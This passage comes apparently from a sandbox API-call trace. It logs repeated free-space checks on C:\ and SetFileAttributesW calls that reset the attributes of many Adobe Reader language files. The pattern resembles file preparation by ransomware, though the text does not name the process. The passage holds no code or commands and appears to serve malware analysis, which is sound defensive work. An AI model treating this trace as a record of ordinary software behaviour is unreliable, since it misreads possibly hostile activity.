lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.116] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.119] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.125] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt", dwFileAttributes=0x80) returned 1 [0111.127] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.134] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt", dwFileAttributes=0x80) returned 1 [0111.137] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.142] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.145] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.151] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt", dwFileAttributes=0x80) returned 1 [0111.154] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.160] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt", dwFileAttributes=0x80) returned 1 [0111.162] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.170] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt", dwFileAttributes=0x80) returned 1 [0111.173] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.178] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt", dwFileAttributes=0x80) returned 1 [0111.181] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.187] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt", dwFileAttributes=0x80) returned 1 [0111.190] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.195] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt", dwFileAttributes=0x80) returned 1 [0111.198] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.205] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt", dwFileAttributes=0x80) returned 1 [0111.207] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.216] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt", dwFileAttributes=0x80) returned 1 [0111.219] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.269] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt", dwFileAttributes=0x80) returned 1 [0111.272] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.278] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CO.txt", dwFileAttributes=0x80) returned 1 [0111.282] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.289] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CR.txt", dwFileAttributes=0x80) returned 1 [0111.307] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.314] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt", dwFileAttributes=0x80) returned 1 [0111.317] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.352] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt", dwFileAttributes=0x80) returned 1 [0111.356] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.364] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES.txt", dwFileAttributes=0x80) returned 1 [0111.367] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.375] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_ES_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.379] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.385] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt", dwFileAttributes=0x80) returned 1 [0111.388] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.452] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_HN.txt", dwFileAttributes=0x80) returned 1 [0111.455] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.461] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_MX.txt", dwFileAttributes=0x80) returned 1 [0111.464] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.470] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_NI.txt", dwFileAttributes=0x80) returned 1 [0111.473] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.479] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PA.txt", dwFileAttributes=0x80) returned 1 [0111.482] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.488] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PE.txt", dwFileAttributes=0x80) returned 1 [0111.491] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.497] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PR.txt", dwFileAttributes=0x80) returned 1 [0111.500] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.505] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PY.txt", dwFileAttributes=0x80) returned 1 [0111.508] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.513] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_SV.txt", dwFileAttributes=0x80) returned 1 [0111.516] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.522] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_US.txt", dwFileAttributes=0x80) returned 1 [0111.524] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.529] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_UY.txt", dwFileAttributes=0x80) returned 1 [0111.532] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.537] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_VE.txt", dwFileAttributes=0x80) returned 1 [0111.540] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.546] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es__TRADITIONAL.txt", dwFileAttributes=0x80) returned 1 [0111.549] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.554] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et.txt", dwFileAttributes=0x80) returned 1 [0111.557] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.562] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et_EE.txt", dwFileAttributes=0x80) returned 1 [0111.565] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.570] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi.txt", dwFileAttributes=0x80) returned 1 [0111.573] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.579] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI.txt", dwFileAttributes=0x80) returned 1 [0111.583] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.588] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.593] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.598] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_CA.txt", dwFileAttributes=0x80) returned 1 [0111.601] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.607] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR.txt", dwFileAttributes=0x80) returned 1 [0111.610] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.615] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.618] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.624] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he.txt", dwFileAttributes=0x80) returned 1 [0111.627] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.633] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he_IL.txt", dwFileAttributes=0x80) returned 1 [0111.635] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.641] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr.txt", dwFileAttributes=0x80) returned 1 [0111.643] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.649] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr_HR.txt", dwFileAttributes=0x80) returned 1 [0111.652] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.657] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu.txt", dwFileAttributes=0x80) returned 1 [0111.660] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.665] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu_HU.txt", dwFileAttributes=0x80) returned 1 [0111.668] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.673] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it.txt", dwFileAttributes=0x80) returned 1 [0111.677] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.682] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_CH.txt", dwFileAttributes=0x80) returned 1 [0111.685] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.693] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT.txt", dwFileAttributes=0x80) returned 1 [0111.695] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.701] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT_PREEURO.txt", dwFileAttributes=0x80) returned 1 [0111.703] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.709] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja.txt", dwFileAttributes=0x80) returned 1 [0111.712] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0111.727] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP.txt", dwFileAttributes=0x80) returned 1 